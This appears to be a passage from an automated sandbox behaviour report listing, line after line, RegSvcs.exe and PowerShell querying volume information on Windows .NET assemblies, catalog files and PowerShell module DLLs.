                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
